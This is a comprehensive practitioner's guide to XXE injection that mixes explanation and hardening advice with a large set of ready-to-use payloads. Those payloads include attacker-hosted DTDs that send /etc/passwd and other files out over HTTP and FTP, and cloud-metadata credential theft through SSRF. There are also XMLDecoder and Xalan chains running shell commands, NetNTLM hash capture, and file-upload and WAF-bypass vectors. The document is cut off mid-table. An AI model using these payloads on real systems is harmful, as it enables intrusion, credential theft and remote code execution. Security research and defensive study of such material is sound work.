Comprehensive XXE Guide#
A practitioner’s reference for XML External Entity injection — fundamentals, parser quirks, in-band and out-of-band exfiltration, parameter entity chains, file-format vectors, real-world CVEs, tooling, and hardening. Compiled from 40 research sources.
Table of Contents#
- Fundamentals
- Attack Surface & Entry Points
- Classic In-Band XXE
- Blind XXE via External DTD
- Error-Based XXE
- Parameter Entities & Local DTD Chains
- XXE → SSRF Pivoting
- XXE → File Read & Information Disclosure
- XXE → RCE
- Parser-Specific Behaviors
- XML File-Format Vectors
- WAF & Filter Bypasses
- Denial of Service
- Real-World CVEs & Chains
- Tooling
- Detection & Prevention
- Payload Quick Reference
1. Fundamentals#
XXE (XML External Entity) injection occurs when an XML parser processes attacker-controlled input with DTD (Document Type Definition) and external entity resolution enabled. The parser treats SYSTEM identifiers as URIs, fetching and substituting their content into the document — yielding file read, SSRF, blind exfiltration, DoS, and in some stacks RCE.
Three classes:
| Class | Description | Example |
|---|---|---|
| In-Band | Entity value reflected directly in response | XML-to-JSON converters, stock-lookup APIs |
| Blind / OOB | No reflection — data exfiltrated via DNS/HTTP/FTP to attacker DTD | SVG/DOCX processors, async workers |
| Error-Based | Content leaked through parser exception messages | Spring Boot 500 handlers, lxml XMLSyntaxError |
Impact spectrum: DNS/HTTP callback → Arbitrary file read → Source code disclosure → Cloud metadata / IMDS token theft → Internal service enumeration → Credential capture (SMB hash) → Remote code execution (PHP expect, Java XMLDecoder, XSLT).
1.1 The XML DTD primer#
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE root [
<!ELEMENT root ANY>
<!ENTITY internal "literal value">
<!ENTITY external SYSTEM "file:///etc/passwd">
<!ENTITY % param SYSTEM "http://attacker/evil.dtd">
]>
<root>&external;</root>
- <!DOCTYPE …>: declares the document type and internal subset.
- <!ELEMENT …>: declares allowed element structure (rarely required).
- <!ENTITY name "value">: general entity, referenced as &name; inside the document body.
- <!ENTITY name SYSTEM "URI">: external general entity, parser fetches the URI.
- <!ENTITY % name …>: parameter entity, referenced as %name; inside the DTD only. Cannot appear inside the document body.
- %name; inside the internal subset is the primitive behind blind and error-based XXE.
1.2 Entity reference rules that matter for exploitation#
- A general entity reference (&x;) is not expanded inside a SYSTEM identifier, so one entity cannot splice another into its URI: <!ENTITY x SYSTEM "http://host/?q=&y;"> does not interpolate &y;.
- Parameter entities (%x;) can be used to concatenate text into other declarations, which is the basis of the “evil.dtd” trick.
- In the internal subset, a parameter-entity reference may appear only between declarations, never inside one. That is why external DTDs are used to host the indirection.
- The internal subset is processed before the external one and the first declaration of an entity wins, so an internal declaration overrides one made in an external DTD. This is the key to local-DTD / error-based chains.
- SYSTEM URIs may be file://, http://, https://, ftp://, gopher://, jar:, netdoc:, data:, php://…, expect://, depending on the platform.
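The split between internal and external general entities can be observed with Python's standard-library ElementTree, which sits on expat. This is a minimal sketch, assuming stock CPython; the `probe` helper and both sample documents are illustrative names, not part of any tool mentioned here.

```python
import xml.etree.ElementTree as ET

# Internal entity: the replacement text lives in the document itself.
INTERNAL = '<!DOCTYPE r [<!ENTITY internal "literal value">]><r>&internal;</r>'
# External entity: the replacement text would have to be fetched from a URI.
EXTERNAL = '<!DOCTYPE r [<!ENTITY external SYSTEM "file:///etc/hostname">]><r>&external;</r>'


def probe(xml_text):
    """Parse xml_text and report what happened to the entity reference."""
    try:
        root = ET.fromstring(xml_text)
    except ET.ParseError as exc:
        # ElementTree does not fetch SYSTEM identifiers, so the unresolved
        # reference is reported as an error instead of being replaced.
        return ("error", str(exc))
    return ("parsed", root.text or "")


if __name__ == "__main__":
    print(probe(INTERNAL))
    print(probe(EXTERNAL))
```

A parser that is vulnerable to classic XXE would return the file contents for the second document; the same two inputs make a quick first check against any target parser.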
1.3 Why it’s still everywhere#
- XML is deep in legacy plumbing (SOAP, SAML, WS-Security, XMPP, RSS/Atom, Office Open XML, SVG, XLIFF, XMP, RDF, PDF metadata, Kubernetes API fallback, Android app processing).
- Many parsers are still permissive about DTDs, either by default or through widely copied flags (libxml2 with LIBXML_DTDLOAD | LIBXML_NOENT, Java SAX/DOM unless features are explicitly disabled, .NET Framework 4.5.1 and earlier, old Nokogiri).
- “JSON only” APIs often accept XML via Content-Type: application/xml or text/xml as an undocumented fallback, which makes them valuable injection points.
- File-format fuzzers routinely uncover XXE in image/document processors that unzip Office documents behind the scenes.
2. Attack Surface & Entry Points#
2.1 Request-level sinks#
| Category | Examples |
|---|---|
| XML request bodies | Content-Type: application/xml, text/xml, application/soap+xml, application/xliff+xml |
| JSON → XML conversion | APIs that accept both; toggle Content-Type: application/xml on a JSON endpoint |
| SOAP / WS-* endpoints | Legacy integrations, admin APIs, invoice/billing, enterprise middleware |
| SAML SSO | SAMLResponse, AuthnRequest, IdP metadata upload |
| RSS / Atom feeds | “Import feed”, link preview, social aggregators |
| File uploads | SVG avatars, DOCX/XLSX/PPTX importers, XMP images, EPUB, XLIFF, XFA PDF forms |
| XInclude points | Server-side XML templating where the DOCTYPE can’t be controlled but XML fragments can |
| Webhook/CI | XML build manifests, Maven POM, Gradle module metadata, .csproj, .xib, .storyboard |
| Printer/orchestration APIs | JMF (Job Messaging Format) on port 4004, XFDF, Xerox FreeFlow |
| SCADA / industrial | Batch job XML, OPC UA fallback, manufacturing execution systems |
2.2 Code-level sinks#
Java javax.xml.parsers.DocumentBuilderFactory / SAXParserFactory
javax.xml.transform.TransformerFactory
javax.xml.validation.SchemaFactory
javax.xml.stream.XMLInputFactory
javax.xml.xpath.XPathFactory
java.beans.XMLDecoder -- deserialization → RCE
org.jdom2.input.SAXBuilder
org.dom4j.io.SAXReader
.NET System.Xml.XmlDocument (with XmlUrlResolver)
System.Xml.XmlTextReader -- pre-4.5.2 defaults dangerous
System.Xml.XmlReader + XmlReaderSettings { DtdProcessing.Parse, XmlResolver = new XmlUrlResolver() }
System.Xml.XPath.XPathDocument
System.Xml.Linq.XDocument (pre-4.5.2)
System.Xml.Serialization.XmlSerializer
Python xml.etree.ElementTree -- expat-based; does not fetch external entities or DTDs, entity-expansion DoS depends on the Expat version
lxml.etree (libxml2) -- parameter-entity XXE until 5.4.0
xml.dom.minidom
xml.sax
xmltodict -- wraps expat
PHP libxml (SimpleXMLElement, DOMDocument, XMLReader)
-- LIBXML_NOENT enables entity substitution (dangerous)
Ruby Nokogiri -- DTDLOAD/NOENT opt-in required
REXML -- XML bomb protection, still resolves ENTITY
Node.js libxmljs, xml2js (with explicitArray/DOCTYPE allowed), xmldom, fast-xml-parser
Go encoding/xml -- does not resolve SYSTEM, generally safe
2.3 Content-Type smuggling#
If a POST endpoint accepts JSON, try swapping the body:
POST /api/order HTTP/1.1
Content-Type: application/xml

<?xml version="1.0"?>
<!DOCTYPE r [<!ENTITY x SYSTEM "http://collab/xxe">]>
<order><item>&x;</item></order>
Burp extension Content Type Converter automates the JSON→XML flip.
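The same flip can be scripted when Burp is not at hand. The sketch below assumes a flat JSON object whose keys are valid XML element names; `json_to_xml_probe`, the `probe` element, and the callback URL are hypothetical names chosen for illustration.

```python
import json
from xml.sax.saxutils import escape


def json_to_xml_probe(json_body, root_tag, callback_url):
    """Re-express a flat JSON object as XML and prepend a DOCTYPE callback probe."""
    fields = json.loads(json_body)
    children = "".join(
        f"<{key}>{escape(str(value))}</{key}>" for key, value in fields.items()
    )
    doctype = f'<!DOCTYPE {root_tag} [<!ENTITY x SYSTEM "{callback_url}">]>'
    # The entity reference gets its own element so the original fields stay intact.
    return (
        '<?xml version="1.0"?>\n'
        f"{doctype}\n"
        f"<{root_tag}>{children}<probe>&x;</probe></{root_tag}>"
    )


if __name__ == "__main__":
    print("Content-Type: application/xml\n")
    print(json_to_xml_probe('{"item": "widget", "qty": 2}', "order", "http://collab/xxe"))
```

Whether the endpoint maps the JSON keys to same-named XML elements is an assumption; real APIs may expect a different root or nesting.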
3. Classic In-Band XXE#
When the parser reflects the entity value in the HTTP response, file disclosure is one request:
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE foo [
<!ENTITY file SYSTEM "file:///etc/passwd">
]>
<stockCheck>
<productId>&file;</productId>
<storeId>1</storeId>
</stockCheck>
When a validating parser rejects undeclared elements, name the root element in the DOCTYPE and declare the elements you use as ANY:
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE stockCheck [
<!ELEMENT stockCheck ANY>
<!ELEMENT productId ANY>
<!ENTITY file SYSTEM "file:///etc/passwd">
]>
<stockCheck>
<productId>&file;</productId>
</stockCheck>
3.1 XInclude — DOCTYPE-less injection#
Useful when the server builds the outer XML and only lets you inject a small fragment (e.g. a productId field that is inlined into a SOAP envelope):
<foo xmlns:xi="http://www.w3.org/2001/XInclude">
<xi:include parse="text" href="file:///etc/passwd"/>
</foo>
Requires an XInclude-aware parser. In Java: DocumentBuilderFactory.setXIncludeAware(true) or XOM/dom4j defaults.
3.2 Directory listing (Java file:// quirk)#
libxml2 and the Java file: URL handler list directory contents when the URI points at a folder:
<!DOCTYPE r [<!ENTITY dir SYSTEM "file:///etc/">]>
<r>&dir;</r>
Java returns a newline-separated listing; libxml2 returns a text rendering. Use for filesystem enumeration before switching to targeted reads.
4. Blind XXE via External DTD#
No reflection? Force the parser to fetch an attacker-hosted DTD and chain parameter entities.
4.1 Step 1 — prove external connectivity#
<?xml version="1.0"?>
<!DOCTYPE test [<!ENTITY % ping SYSTEM "http://collab.example/"> %ping;]>
<r/>
If the Burp Collaborator / interact.sh receives a hit, the parser resolves parameter entities and will fetch remote DTDs.
4.2 Step 2 — chain a parameter entity for OOB exfil#
Hosted at http://attacker/evil.dtd:
<!ENTITY % file SYSTEM "file:///etc/hostname">
<!ENTITY % eval "<!ENTITY &#x25; exfil SYSTEM 'http://attacker/x?d=%file;'>">
%eval;
%exfil;
Victim payload:
<?xml version="1.0"?>
<!DOCTYPE r [<!ENTITY % xxe SYSTEM "http://attacker/evil.dtd"> %xxe;]>
<r/>
Flow: victim parser fetches evil.dtd → defines %file → %eval builds %exfil dynamically → %exfil makes an HTTP GET with the file contents in the query string.
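The attacker-side pieces of this flow can be sketched in a few lines. This is only an illustration under assumptions: `build_evil_dtd` and `extract_exfil` are hypothetical helpers, and the `d` query parameter simply mirrors the evil.dtd shown above. Serving the DTD and logging requests is left to whatever HTTP listener is in use.

```python
from urllib.parse import parse_qs, urlsplit

# &#x25; is a character reference for "%": it keeps the nested declaration
# inert until %eval; is expanded by the victim parser.
DTD_TEMPLATE = """<!ENTITY % file SYSTEM "{target}">
<!ENTITY % eval "<!ENTITY &#x25; exfil SYSTEM '{callback}?d=%file;'>">
%eval;
%exfil;
"""


def build_evil_dtd(target_uri, callback_base):
    """Return the external DTD text for the two-stage parameter-entity chain."""
    return DTD_TEMPLATE.format(target=target_uri, callback=callback_base)


def extract_exfil(request_path):
    """Pull the leaked value out of a logged request path such as /x?d=web01."""
    query = urlsplit(request_path).query
    values = parse_qs(query, keep_blank_values=True).get("d", [])
    return values[0] if values else None


if __name__ == "__main__":
    print(build_evil_dtd("file:///etc/hostname", "http://attacker/x"))
    print(extract_exfil("/x?d=web01"))
```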
4.3 FTP for multi-line files#
Newlines in the leaked data usually break the HTTP request or get the URL rejected outright, so multi-line files rarely survive an HTTP exfil. For files like /etc/passwd use FTP, where the file contents ride as the password in the URI:
<!ENTITY % file SYSTEM "file:///etc/passwd">
<!ENTITY % all "<!ENTITY &#x25; send SYSTEM 'ftp://a:%file;@attacker/x'>">
%all;
%send;
Pair with a dummy FTP listener (e.g. ONsec xxe-ftp-server.rb) that logs the PASS command without actually handshaking.
4.4 Gopher (legacy Java ≤ 1.7)#
<!ENTITY % send SYSTEM "gopher://attacker:1337/?%file;">
Effectively extinct in modern deployments but still useful on embedded Java or ancient appliances.
4.5 DNS-only exfiltration#
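When only outbound DNS is allowed, encode one file-byte per subdomain via iterative XXE or use a tool like XXEinjector to chunk. For simple fingerprinting a bare DNS lookup against a unique label is enough. The parser performs no shell expansion, so the label must be a literal token (probe-7f3a here is a placeholder):
<!ENTITY % p SYSTEM "http://probe-7f3a.dns.attacker.tld/">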
5. Error-Based XXE#
Used when OOB is blocked (egress filtered) but the app surfaces parser errors.
5.1 External-DTD error variant#
<!-- evil.dtd -->
<!ENTITY % file SYSTEM "file:///etc/passwd">
<!ENTITY % eval "<!ENTITY &#x25; error SYSTEM 'file:///nonexistent/%file;'>">
%eval;
%error;
The parser tries to open file:///nonexistent/<contents of /etc/passwd>, fails, and embeds the missing-path string in the exception thrown back to the client.
5.2 Purely local (no egress) — local DTD trick#
PortSwigger / Arseniy Sharoglazov’s technique: find a DTD that already exists on the server filesystem whose entities can be redefined from the internal subset.
Canonical example (GNOME yelp):
<!DOCTYPE foo [
<!ENTITY % local_dtd SYSTEM "file:///usr/share/yelp/dtd/docbookx.dtd">
<!ENTITY % ISOamso '
<!ENTITY &#x25; file SYSTEM "file:///etc/passwd">
<!ENTITY &#x25; eval "<!ENTITY &#x26;#x25; error SYSTEM &#x27;file:///nonexistent/&#x25;file;&#x27;>">
&#x25;eval;
&#x25;error;
'>
%local_dtd;
]>
<r/>
%ISOamso; is redefined to inject additional declarations; when %local_dtd; is expanded the injected entities fire and produce the error.
Other high-hit local DTDs (see GoSecure dtd-finder for full list):
| Path | Overridable entity |
|---|---|
| /usr/share/yelp/dtd/docbookx.dtd | ISOamso |
| /usr/share/xml/fontconfig/fonts.dtd | constant |
| /usr/share/xml/scrollkeeper/dtds/scrollkeeper-omf.dtd | various |
| /opt/IBM/WebSphere/AppServer/properties/schemas/j2ee/XMLSchema.dtd | WebSphere |
| /usr/share/java/xalan2.jar!/org/apache/xalan/res/XSLTInfo.properties | Xalan |
| C:\Windows\System32\wbem\xml\cim20.dtd | Windows |
Brute-force the DTD path with Intruder using the dtd_files.txt wordlist from the GoSecure repo.
5.3 GoSecure dtd-finder#
java -jar dtd-finder.jar /path/to/docker-image.tar
Scans a tarball/Docker image for DTDs and automatically identifies entities that can be overridden. Point at the target’s base image to build a custom payload list.
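The core idea can be approximated in a few lines when the Java tool is not available. The sketch below is a simplification and not the dtd-finder algorithm: it walks an already-extracted directory tree and lists parameter entities that a DTD both declares and later references, which are the candidates for redefinition. `find_overridable_entities` and the file-extension list are assumptions.

```python
import os
import re

# Matches declarations such as: <!ENTITY % ISOamso "...">
PARAM_ENTITY = re.compile(r"<!ENTITY\s+%\s+([A-Za-z_][\w.\-]*)\s")


def find_overridable_entities(root_dir):
    """Map each DTD-like file under root_dir to parameter entities it declares and uses."""
    hits = {}
    for folder, _subdirs, files in os.walk(root_dir):
        for name in files:
            if not name.lower().endswith((".dtd", ".mod", ".ent")):
                continue
            path = os.path.join(folder, name)
            with open(path, "r", encoding="utf-8", errors="replace") as handle:
                text = handle.read()
            # Only entities that are referenced (%name;) can carry an injected payload.
            used = sorted(
                {n for n in PARAM_ENTITY.findall(text) if f"%{n};" in text}
            )
            if used:
                hits[path] = used
    return hits


if __name__ == "__main__":
    for path, names in find_overridable_entities("/usr/share").items():
        print(path, names)
```

Each hit still needs manual confirmation, because the reference must sit at a position where injected declarations are legal.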
6. Parameter Entities & Local DTD Chains#
Understanding the parameter-entity gymnastics is essential because almost every advanced XXE variant boils down to:
- Define %file that reads the target.
- Define %eval that, when expanded, declares a third entity whose URI concatenates %file’s value.
- Expand %eval, then expand the generated entity.
6.1 Character-reference encoding#
Because % and & inside the internal subset are parsed immediately, you must delay their evaluation. Use character references:
| Literal | Delayed form |
|---|---|
| % | &#x25; |
| & | &#x26; |
| % (one more level) | &#x26;#x25; |
Rule of thumb: each additional layer of delayed expansion replaces the leading & with one more &#x26;.
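The rule of thumb can be checked mechanically. In this sketch, `defer` and `decode_once` are hypothetical helper names; `decode_once` models a single pass of character-reference resolution, which is a simplification of what a real parser does.

```python
import re


def defer(char, layers):
    """Encode char so it only becomes literal after `layers` rounds of decoding."""
    if layers == 0:
        return char
    ref = f"&#x{ord(char):X};"
    # Every extra layer hides the leading "&" behind its own reference.
    for _ in range(layers - 1):
        ref = ref.replace("&", "&#x26;")
    return ref


def decode_once(text):
    """Resolve one layer of hexadecimal character references."""
    return re.sub(r"&#x([0-9A-Fa-f]+);", lambda m: chr(int(m.group(1), 16)), text)


if __name__ == "__main__":
    for layers in range(1, 4):
        print(layers, defer("%", layers))
```

Peeling the two-layer form with `decode_once` twice returns the literal `%`, which matches the order in which nested declarations come alive.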
6.2 Double-encoded payload template#
<!ENTITY % outer '
<!ENTITY &#x25; file SYSTEM "file:///flag">
<!ENTITY &#x25; wrap "<!ENTITY &#x26;#x25; leak SYSTEM &#x27;http://a/?x=&#x25;file;&#x27;>">
&#x25;wrap;
&#x25;leak;
'>
%outer;
6.3 lxml “meow://” trick (libxml2 bypass of 5.4.0 hardening)#
lxml ≥ 5.4.0 blocked error-parameter entities, but general entities built from parameter entities still leak via a bogus scheme:
<!DOCTYPE colors [
<!ENTITY % a '
<!ENTITY &#x25; file SYSTEM "file:///tmp/flag.txt">
<!ENTITY &#x25; b "<!ENTITY c SYSTEM &#x27;meow://&#x25;file;&#x27;>">
'>
%a; %b;
]>
<colors>&c;</colors>
The parser reports failed to load external entity "meow://FLAG{secret}" — flag in error message, no egress needed.
Fixed in lxml ≥ 5.4.0 and libxml2 ≥ 2.13.8. Either alone is not sufficient.
7. XXE → SSRF Pivoting#
Any XXE that resolves external entities over a network scheme is also an SSRF primitive: an http:// SYSTEM URI forces the server to issue an outbound request.
7.1 Cloud metadata exfil#
AWS (IMDSv1):
<!ENTITY aws SYSTEM "http://169.254.169.254/latest/meta-data/iam/security-credentials/">
GCP:
<!ENTITY gcp SYSTEM "http://metadata.google.internal/computeMetadata/v1/instance/service-accounts/default/token">
Note: GCP IMDS requires Metadata-Flavor: Google header — XXE typically can’t set request headers, so GCP is usually a dead end unless the parser uses a custom HTTP client that forwards request headers.
Azure IMDS:
<!ENTITY az SYSTEM "http://169.254.169.254/metadata/instance?api-version=2021-02-01">
Azure also requires Metadata: true header — usually blocked, same caveat as GCP.
IMDSv2 on AWS requires a PUT to get a token — blocks naive XXE. If the backend still permits IMDSv1 via HttpTokens=optional, exploitation stays trivial.
7.2 Internal port scan / service enumeration#
Error/response timing differences reveal open vs closed ports:
<!ENTITY scan SYSTEM "http://10.0.0.5:6379/">
Redis/Memcached/Elasticsearch without auth can sometimes be driven via gopher smuggling, though XXE alone lacks CRLF control.
7.3 JMF / print orchestration (Xerox FreeFlow Core)#
Real case: a JMF listener on TCP/4004 parsed XML without hardening. A crafted JMF DOCTYPE with a SYSTEM entity caused the server to issue outbound HTTP, confirming SSRF. Chained with a subsequent path traversal, it led to unauthenticated RCE.
<?xml version="1.0"?>
<!DOCTYPE JMF [<!ENTITY probe SYSTEM "http://collab/oob">]>
<JMF SenderID="t" Version="1.3"><Query Type="KnownMessages">&probe;</Query></JMF>
8. XXE → File Read & Information Disclosure#
8.1 High-value target files (Linux)#
/etc/passwd /etc/shadow (rarely readable)
/etc/hosts /etc/resolv.conf
/proc/self/environ env vars, often contain secrets & tokens
/proc/self/cmdline full process command line
/proc/self/cwd/<file> relative-path access
/proc/self/net/tcp open sockets
/proc/self/status
/proc/version /etc/issue fingerprinting
/proc/1/maps memory mappings
/root/.ssh/id_rsa /root/.aws/credentials if root-run
/var/lib/kubelet/config.yaml
/run/secrets/kubernetes.io/serviceaccount/token
8.2 Windows#
C:\Windows\win.ini
C:\Windows\System32\drivers\etc\hosts
C:\inetpub\wwwroot\web.config
C:\inetpub\logs\LogFiles\
C:\Windows\System32\inetsrv\config\applicationHost.config
file://attacker-smb-share/a.jpg → NetNTLMv2 hash capture via Responder
8.3 Binary & non-ASCII file read#
Raw file:// breaks on non-XML-safe bytes. Wrap in base64 via PHP filter:
<!ENTITY x SYSTEM "php://filter/convert.base64-encode/resource=/var/www/html/config.php">
Java: wrap the read inside a CDATA block via a two-stage entity construction (XXEinjector --cdata mode).
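Once the base64 text comes back in a response, it still has to be cleaned up and decoded. A minimal sketch, assuming the reflected value has already been cut out of the response body; `decode_filter_output` is an illustrative name.

```python
import base64
import re


def decode_filter_output(reflected):
    """Decode base64 text returned through php://filter/convert.base64-encode."""
    # Responses often wrap or pad the value with whitespace; strip it first.
    compact = re.sub(r"\s+", "", reflected)
    return base64.b64decode(compact, validate=True)


if __name__ == "__main__":
    sample = base64.b64encode(b"<?php $db_pass = 's3cret'; ?>").decode("ascii")
    print(decode_filter_output(sample))
```

The result is returned as bytes on purpose, so binary files survive without any text decoding step.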
8.4 Source code recovery#
PHP filters cover the filesystem; combine with .git/config, .svn/wc.db, composer.json, framework configs to rebuild source trees.
9. XXE → RCE#
9.1 PHP expect:// wrapper#
If the expect extension is loaded:
<!DOCTYPE r [<!ENTITY x SYSTEM "expect://id">]>
<r>&x;</r>
Rare in the wild — pecl expect is almost never deployed — but still worth testing when PHP fingerprint is confirmed.
9.2 Java XMLDecoder deserialization#
java.beans.XMLDecoder.readObject() processes XML that instantiates arbitrary classes. If an app exposes it to user input, it’s instant RCE (not strictly XXE but frequently conflated because the entry point is XML).
<?xml version="1.0"?>
<java version="1.7.0_21" class="java.beans.XMLDecoder">
<object class="java.lang.Runtime" method="getRuntime">
<void method="exec">
<array class="java.lang.String" length="3">
<void index="0"><string>/bin/sh</string></void>
<void index="1"><string>-c</string></void>
<void index="2"><string>id > /tmp/p</string></void>
</array>
</void>
</object>
</java>
Real CVE targets: Oracle WebLogic CVE-2017-10271, Restlet XMLDecoder endpoints.
9.3 XSLT → Java RCE via Xalan#
If you can control a stylesheet (or feed XSLT to a Transformer):
<xsl:stylesheet version="1.0"
xmlns:xsl="http://www.w3.org/1999/XSL/Transform"
xmlns:rt="http://xml.apache.org/xalan/java/java.lang.Runtime"
xmlns:str="http://xml.apache.org/xalan/java/java.lang.String">
<xsl:template match="/">
<xsl:variable name="cmd">touch /tmp/pwn</xsl:variable>
<xsl:variable name="rt" select="rt:getRuntime()"/>
<xsl:variable name="p" select="rt:exec($rt,$cmd)"/>
</xsl:template>
</xsl:stylesheet>
Default-enabled on Java’s Xalan until JDK 15 introduced jdk.xml.enableExtensionFunctions=false.
9.4 jar: protocol → file-write → RCE chain#
Java’s jar:http://… handler downloads a ZIP to /tmp/…, extracts it, reads a member, then deletes the archive. Hanging the HTTP server indefinitely keeps the temp file alive. Combined with a second vulnerability (LFI, template injection, deserialization, XSLT upload) this yields RCE.
<!ENTITY x SYSTEM "jar:http://attacker:8080/evil.zip!/marker.txt">
Workshop tooling: slow_http_server.py / slowserver.jar from GoSecure xxe-workshop.
9.5 NetNTLMv2 capture (Windows)#
<!ENTITY x SYSTEM "file:////attacker/share/a.jpg">
Point Responder.py -I eth0 at the listener, capture the NetNTLMv2 hash, crack with hashcat -m 5600.
10. Parser-Specific Behaviors#
10.1 libxml2 (PHP, Python lxml, Ruby Nokogiri, many C/C++ apps)#
- External entity resolution is off by default since 2.9.0 unless LIBXML_NOENT or LIBXML_DTDLOAD is set.
- PHP’s libxml_disable_entity_loader(true) was the historical fix (deprecated in PHP 8).
- Parameter-entity expansion continued even with “safe” settings until 2.13.8.
- Directory listing via file:///etc/ supported.
10.2 Xerces (Java SAX/DOM)#
- DocumentBuilderFactory / SAXParserFactory still default to entity resolution enabled unless features are explicitly disabled.
- Hardening flags (all must be set):
  - http://apache.org/xml/features/disallow-doctype-decl → true (best defence)
  - http://xml.org/sax/features/external-general-entities → false
  - http://xml.org/sax/features/external-parameter-entities → false
  - http://apache.org/xml/features/nonvalidating/load-external-dtd → false
  - FEATURE_SECURE_PROCESSING → true
  - setXIncludeAware(false); setExpandEntityReferences(false)
- TransformerFactory, SchemaFactory, XPathFactory, Validator, SAXTransformerFactory each need independent hardening via ACCESS_EXTERNAL_DTD / ACCESS_EXTERNAL_STYLESHEET / ACCESS_EXTERNAL_SCHEMA.
10.3 .NET#
| API | Default (pre-4.5.2) | Default (4.5.2+) |
|---|---|---|
| XmlDocument | XmlUrlResolver present (vulnerable) | XmlResolver = null (safe) |
| XmlTextReader | ProhibitDtd = false (vulnerable) | DtdProcessing = Prohibit (safe) |
| XmlReader (via XmlReader.Create) | DtdProcessing = Prohibit (safe) | safe |
| XPathDocument | dangerous | fixed |
| XDocument / XElement | uses XmlReader internally, generally safe | safe |
Always dangerous regardless of version: setting XmlResolver = new XmlUrlResolver() or DtdProcessing = Parse with non-null resolver.
Look for these patterns in C# code review:
var rdr = new XmlTextReader(input);
rdr.XmlResolver = new XmlUrlResolver(); // BAD
rdr.DtdProcessing = DtdProcessing.Parse; // BAD
var settings = new XmlReaderSettings {
DtdProcessing = DtdProcessing.Parse, // BAD
XmlResolver = new XmlUrlResolver(), // BAD
MaxCharactersFromEntities = 0 // enables unbounded billion-laughs
};
The unhardened-default pattern is not specific to .NET. Real CVE on the Java side: CVE-2025-27136 in the LocalS3 Java S3 emulator used a default DocumentBuilderFactory on the CreateBucketConfiguration endpoint, letting unauthenticated attackers read /etc/passwd.
10.4 Python lxml#
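- Safe mode: etree.XMLParser(resolve_entities=False, load_dtd=False, no_network=True).
- Parameter-entity XXE viable before lxml 5.4.0 / libxml2 2.13.8, even with resolve_entities=False, when load_dtd=True.
- The defusedxml package wraps the stdlib parsers and rejects entity declarations and external references by default; pass forbid_dtd=True to reject DOCTYPE entirely. Recommended for stdlib parsing (its lxml wrapper is deprecated).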
10.5 Nokogiri (Ruby)#
- Safe by default. Dangerous only when DTDLOAD | NOENT is passed: Nokogiri::XML(input) { |c| c.dtdload.noent } # BAD
- REXML::Document: inherits from ruby-stdlib; patches since 2013 cap recursion but general entities still expand.
10.6 Go encoding/xml#
- Does not resolve SYSTEM entities. Historically considered safe.
- Custom decoders (etree, html-xml-tools) can still be coaxed to fetch DTDs; review any third-party XML lib on Go.
11. XML File-Format Vectors#
Any file whose internals contain XML is an XXE delivery vehicle.
11.1 SVG (file upload)#
<?xml version="1.0"?>
<!DOCTYPE svg [<!ENTITY x SYSTEM "file:///etc/hostname">]>
<svg xmlns="http://www.w3.org/2000/svg" width="300" height="200">
<text>&x;</text>
</svg>
Or <image xlink:href="file:///etc/hostname"/>. Works against ImageMagick (prior to policy.xml hardening), librsvg, Inkscape, Apache Batik, many cloud image processors.
11.2 Office Open XML (DOCX, XLSX, PPTX)#
- unzip foo.docx -d foo/
- Edit foo/word/document.xml (or xl/workbook.xml): insert <!DOCTYPE …> with the payload between the XML prolog and the root element.
- cd foo && zip -r ../evil.docx .
- Upload to the target’s document-processing feature (resume parsers, invoice ingest, doc-to-PDF).
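The unzip, edit, and re-zip steps above can also be done in memory. This is a sketch under assumptions: the member is UTF-8 without a byte-order mark, and `inject_doctype` is a hypothetical helper rather than part of any tool named in this guide.

```python
import io
import zipfile


def inject_doctype(docx_bytes, doctype, member="word/document.xml"):
    """Return a copy of the archive with `doctype` placed after the XML prolog of `member`."""
    source = zipfile.ZipFile(io.BytesIO(docx_bytes))
    output = io.BytesIO()
    with zipfile.ZipFile(output, "w", zipfile.ZIP_DEFLATED) as target:
        for info in source.infolist():
            data = source.read(info.filename)
            if info.filename == member:
                text = data.decode("utf-8")
                end = text.find("?>")
                # Insert right after the prolog, or at the very start if there is none.
                cut = end + 2 if text.startswith("<?xml") and end != -1 else 0
                text = text[:cut] + doctype + text[cut:]
                data = text.encode("utf-8")
            target.writestr(info.filename, data)
    return output.getvalue()


if __name__ == "__main__":
    payload = '<!DOCTYPE x [<!ENTITY % r SYSTEM "http://attacker/evil.dtd"> %r;]>'
    with open("foo.docx", "rb") as handle:
        evil = inject_doctype(handle.read(), payload)
    with open("evil.docx", "wb") as handle:
        handle.write(evil)
```

For XLSX, pass member="xl/workbook.xml"; all other archive members are copied unchanged.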
11.3 XLIFF (translation files)#
Typical consumers: Apache Tika, Okapi, XLIFF Toolbox. Example that worked against a Java 1.8 parser:
<?xml version="1.0"?>
<!DOCTYPE XXE [<!ENTITY % remote SYSTEM "http://attacker/evil.dtd"> %remote;]>
<xliff srcLang="en" trgLang="ms-MY" version="2.0"/>
11.4 PDF (XFA forms, XMP metadata)#
Acrobat XFA forms wrap XML; PDF metadata (/Metadata stream) carries an XMP packet. Many server-side PDF handlers (iText, PDFBox, Ghostscript) parse these.
11.5 EPUB, ODF#
EPUB is a ZIP containing XHTML + OPF XML. ODF (LibreOffice) is a ZIP of content.xml / styles.xml. Both have historical XXE CVEs in reader software.
11.6 SVG / MathML embedded in HTML#
If an HTML sanitizer passes SVG through unchanged and a later stage parses it with an XML parser, XXE is reachable even when the primary input is HTML.
11.7 SOAP envelopes#
<soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
<soap:Body>
<foo><![CDATA[<!DOCTYPE d [<!ENTITY % r SYSTEM "http://a/e.dtd"> %r;]><d/>]]></foo>
</soap:Body>
</soap:Envelope>
CDATA wrapping sometimes bypasses outer sanitization.
11.8 SAML#
SAMLResponse XML is base64-encoded before transport — decode, inject DOCTYPE, re-encode. Signature validation may invalidate the payload unless the IdP-trust relationship allows a re-signed document; however many SPs parse the XML before signature verification (classic XSW-style bugs), making XXE trivially reachable.
11.9 RSS / Atom#
Feed-ingest services (Feedly-like, Slack preview bots, Hootsuite) routinely fetch user URLs and parse RSS. Host a poisoned feed and wait.
11.10 Android / iOS asset bundles#
Android manifest, .xib, .storyboard, .plist (XML variant) — XXE reached via supply-chain build tooling has produced numerous CI takeovers.
12. WAF & Filter Bypasses#
12.1 Encoding#
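- UTF-7 / UTF-16: re-encode the payload and declare the matching encoding (for example encoding="UTF-7") in the prolog. Many WAFs only inspect UTF-8.
- Numeric character references inside an entity value to obscure nested <!ENTITY / SYSTEM keywords; the parser decodes them when it reads the entity value. They cannot hide the top-level DOCTYPE keyword itself.
- Comment injection: comments (<!-- … -->) are allowed between declarations in a DTD but not inside a declaration, so character references inside entity values remain the main way to obscure declaration content.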
12.2 Scheme alternatives#
| Blocked | Alternative |
